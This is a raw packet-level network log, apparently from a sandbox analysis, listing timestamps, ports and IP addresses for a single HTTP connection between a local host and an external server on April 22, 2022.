Apr 22, 2022 16:17:42.220405102 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.220417023 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.220427036 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.220433950 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.220453024 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.220470905 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.220477104 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.220489979 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.220503092 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.220509052 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.220525026 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.220529079 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.220547915 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.220556974 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.220567942 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.220582008 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.220585108 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.220596075 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.220607996 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.220627069 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.220645905 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.220650911 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.220663071 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.220680952 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.220685959 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.220698118 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.220706940 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.220726013 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.220738888 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.220743895 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.220757961 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.220772982 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.220774889 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.220793962 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.220807076 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.220812082 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.220832109 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.220843077 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.220848083 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.220865011 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.220866919 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.220885038 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.220900059 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.220901966 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.220921040 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.220933914 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.220937967 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.220956087 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.220961094 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.220973969 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.220982075 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.220990896 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.221009970 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.221018076 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.221026897 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.221044064 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.221054077 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.221060991 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.221077919 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.221081972 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.221096992 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.221116066 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.221117973 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.221134901 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.221148968 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.221153021 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.221172094 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.221175909 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.221189022 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.221195936 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.221206903 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.221224070 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.221235991 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.221240997 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.221260071 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.221257925 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.221276045 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.221285105 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.221293926 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.221312046 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.221323013 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.221329927 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.221360922 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.221379995 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.289186001 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.292022943 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.292073965 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.292107105 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.292130947 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.292154074 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.292170048 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.292177916 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.292201996 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.292222023 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.292222977 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.292247057 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.292251110 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.292269945 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.292277098 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.292294025 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.292320967 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.292320967 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.292345047 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.292361021 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.292362928 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.292388916 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.292407990 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.292414904 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.292432070 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.292450905 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.292452097 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.292469025 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.292478085 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.292486906 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.292505980 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.292524099 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.292526960 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.292545080 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.292568922 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.292568922 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.292587042 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.292597055 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.292604923 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.292623043 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.292642117 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.292642117 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.292659998 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.292676926 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.292684078 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.292695045 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.292711020 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.292711020 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.292728901 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.292747021 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.292761087 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.292763948 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.292787075 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.292802095 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.292804003 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.292820930 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.292836905 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.292839050 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.292856932 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.292865992 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.292874098 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.292890072 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.292892933 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.292911053 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.292927980 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.292936087 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.292946100 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.292963028 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.292979956 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.292996883 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.293008089 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.293014050 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.293020964 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.293034077 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.293045044 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.293051004 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.293067932 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.293085098 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.293087959 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.293102026 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.293121099 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.293134928 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.293138981 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.293155909 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.293168068 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.293174028 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.293196917 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.293201923 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.293215990 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.293227911 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.293234110 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.293252945 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.293272018 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.293272018 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.293289900 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.293307066 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.293313980 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.293324947 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.293340921 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.293343067 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.293360949 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.293371916 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.293386936 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.293406010 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.293406963 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.293425083 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.293431997 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.293448925 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.293467045 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.293476105 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.293484926 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.293503046 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.293520927 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.293524027 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.293540001 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.293556929 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.293557882 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.293577909 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.293589115 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.293596029 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.293612957 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.293615103 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.293632984 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.293649912 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.293664932 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.293667078 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.293688059 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.293704987 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.293714046 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.293725014 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.293746948 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.293747902 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.293760061 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.293773890 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.293792009 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.293811083 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.293826103 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.293828011 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.293845892 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.293858051 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.293864012 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.293885946 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.293890953 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.293905020 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.293916941 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.293921947 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.293940067 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.293957949 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.293976068 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.293977976 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.293993950 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.294013023 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.294028997 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.294029951 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.294045925 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.294064045 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.294074059 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.294080019 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.294097900 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.294111013 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.294115067 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.294132948 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.294148922 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.294154882 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.294183016 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.294188023 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.294203997 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.294203997 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.294223070 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.294240952 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.294251919 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.294260979 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.294280052 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.294296980 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.294298887 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.294316053 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.294327974 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.294338942 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.294357061 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.294363976 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.294375896 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.294389963 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.294394016 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.294410944 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.294435024 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.294442892 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.294451952 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.294471979 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.294487000 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.294493914 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.294511080 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.294523001 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.294528008 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.294545889 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.294560909 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.294562101 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.294579983 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.294595957 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.294596910 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.294614077 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.294627905 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.294631004 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.294642925 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.294655085 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.294657946 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.294667959 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.294686079 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.294702053 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.294718981 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.294724941 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.294737101 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.294758081 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.294776917 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.294778109 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.294794083 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.294806004 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.294810057 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.294827938 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.294835091 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.294847012 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.294863939 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.294868946 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.294881105 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.294897079 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.294897079 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.294914961 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.294931889 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.294949055 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.294955015 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.294965982 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.294984102 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.295001030 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.295006037 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.295017958 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.295033932 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.295036077 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.295051098 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.295068979 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.295068979 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.295085907 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.295099020 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.295103073 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.295120001 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.295130968 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.295136929 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.295156002 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.295161963 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.295171976 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.295190096 CEST	80	49842	193.56.146.148	192.168.2.6
